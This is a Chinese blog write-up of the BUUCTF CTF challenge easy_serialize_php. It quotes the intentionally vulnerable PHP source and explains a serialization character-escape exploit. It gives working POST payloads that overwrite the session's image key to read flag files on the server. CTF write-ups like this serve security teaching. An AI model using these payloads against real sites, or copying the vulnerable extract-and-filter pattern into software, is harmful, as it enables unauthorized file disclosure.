buuctf easy_serialize_php

已于 2022-03-30 00:38:56 修改
阅读量1.8k 收藏
点赞数 2
分类专栏: web 文章标签: php web安全
于 2022-03-30 00:37:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52671379/article/details/123835526
版权

buuctf easy_serialize_php

题目

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

代码分析

首先是一个GET传参赋值给$function,将’php’,‘flag’,‘php5’,‘php4’,'fl1g’替换为空格

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

if判断语句,如果$_SESSION存在则把其unset(消除)。
之后重新定义$_SESSION最后exact($_POST)
unset() 销毁指定的变量。
exact($_POST):将$_GET$_POST超级变量数组获取的变量转为正常的变量,这样直接显示变量名称即可

if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>
    
>> $a = Cat; $b = Dog; $c = Horse

在这里插入图片描述

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

判断是否传参img_path。
看else语句会发现sha1是不可逆加密,所以不能执行else

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

通过给$function参数赋值phpinfo,会发现有个名为 d0g3_f1ag.php,flag可能在这里。
想得到flag,$function的值就要为show_image,然后反序列化,base64解密通过file_get_contents来输出文件内容。
.在这里插入图片描述直接访问文件,无法获取flag
选择构造反序列化逃逸进行绕过
反序列化的对象逃逸问题分为两种。
第一种为关键词数增加
第二种为关键词数减少
这道题目中直接构造多个关键词,这样就能逃出几个字符
也可以通过键逃逸和值逃逸

值逃逸:

构造键值对的数组的POST:
_SESSION[flagphp]=;s:1:“a”;s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}
d0g3_f1ag.php经过base64为ZDBnM19mMWFnLnBocA==
payload经过if语句和序列化处理后变成了:

a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

再经过filter函数处理将flagphp替换为空后成立我们想得到的结果
s:7:"phpflag";s:48:" 就变成了 s:7:"";s:48:";完成了逃逸
s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";键名img对应的值是d0g3_f1ag.php的base64编码。
而后面的;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"全放弃了。

a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

构造数组,

GET:?f=show_image
post:_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

访问查看源码得到新的提示,flag在根目录d0g3_fllllllag中
在这里插入图片描述
继续将/d0g3_fllllllag经过base64编码传值

so payload1:
GET:?f=show_image
post:_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

在这里插入图片描述

老young可爱
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[安洵杯 2019]easy_serialize_php--序列化绕过,extract()函数。
cainiao17441898的博客
06-06 337
解题: 打开源码: <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESS
BUUCTF刷题记录(4)
bmth666的博客
04-12 1351
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
[安洵杯 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3064
[安洵杯 2019]easy_serialize_php 反序列化
web buuctf [安洵杯 2019]easy_serialize_php
weixin_44214568的博客
04-02 448
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
easy_serialize_php
beihai2013
01-19 459
easy_serialize_php 考察:php代码审计,php序列化 打开页面,打开view-source,可以看到源代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace(
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
标签中的“mfc_serialize_socket”表明这些示例还涵盖了通过网络套接字进行串行化。`CSocket`类是MFC提供的网络编程接口,它允许对象通过TCP/IP协议进行通信。通过结合`CSocket`和`CArchive`,对象可以被发送到远程...
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
se_mouz_image.rar_serialize_序列化
09-23
在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档以及实现鼠标画图功能。 首先,我们来详细解释一下`serialize()`函数。`serialize()`是PHP内建的一个...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
**jet_serialize: 用于JavaScript的扩展序列化程序** 在JavaScript编程中,数据的序列化是一个常见的需求,它涉及将对象转换为字符串以便存储或传输。`jet_serialize`库提供了一个强大的解决方案,允许开发者以更...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
BUUCTF [安洵杯 2019]easy_serialize_php
m0_62107966的博客
09-24 557
BUUCTF [安洵杯 2019]easy_serialize_phpphp反序列化时,当一整段内容反序列化结束后,后面的非法字符将会被忽略,而如何判断是否结束呢,可以看到,前面有一个a:3,表示序列化的内容是一个数组,有三个键,而以{作为序列化内容的起点,}作为序列化内容的终点。 所以此时后面的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}在反序列化时就会被当作非法字符忽略掉,导致我们可以控制$userinfo["img"]的值,达到任意文件读取的效
buuctf[安洵杯 2019]easy_serialize_php
最新发布
2202_75317918的博客
03-30 455
buuctf[安洵杯 2019]easy_serialize_php
easy_serialize_php(反序列化字符逃逸)
weixin_45007073的博客
03-16 1047
前言 今天突然想起来代码审计好像很久没搞了,在网上找到了个2019的安洵杯的题目。题目的考点是反序列化字符逃逸,通过字符的逃逸我们才能拿到对应的flag值。 反序列化原理 我们要了解反序列化字符逃逸的原理,首先就要先了解反序列化的原理,我们先举个简单的例子帮助理解和分析。 <?php $img["one"] = "flag"; $img["two"] = "test"; $a = serialize($img); var_dump($a); $b = unserialize($a); va
------已搬运-------BUUCTF:[安洵杯 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 627
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
[安洵杯 2019]easy_serialize_php
Yang_99的博客
08-08 516
1.考点 锻炼代码审计能力和学习 PHP反序列化 反序列化中的对象逃逸 分析题目源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);
buuctf刷题记录
Realiy的博客
08-06 837
8月6日buuctf [MRCTF2020]Ez_bypass 知识点MD5绕过,php特性 打开得到源码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (m
安洵杯2019 easy_serialize_php (反序列化中的对象逃逸)
a3320315的博客
01-30 7513
0x01 题目源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_repla...
【学习笔记 45】 buu [安洵杯 2019]easy_serialize_php
weixin_43553654的博客
08-03 480
0x00 知识点 php反序列化逃逸 代码审计 0x01 知识点详解 什么是php反序列化逃逸? 答: <?php $_SESSION["user"]='flagflagflagflagflagflag'; $_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}'; $_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn'; echo serialize($_SE
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值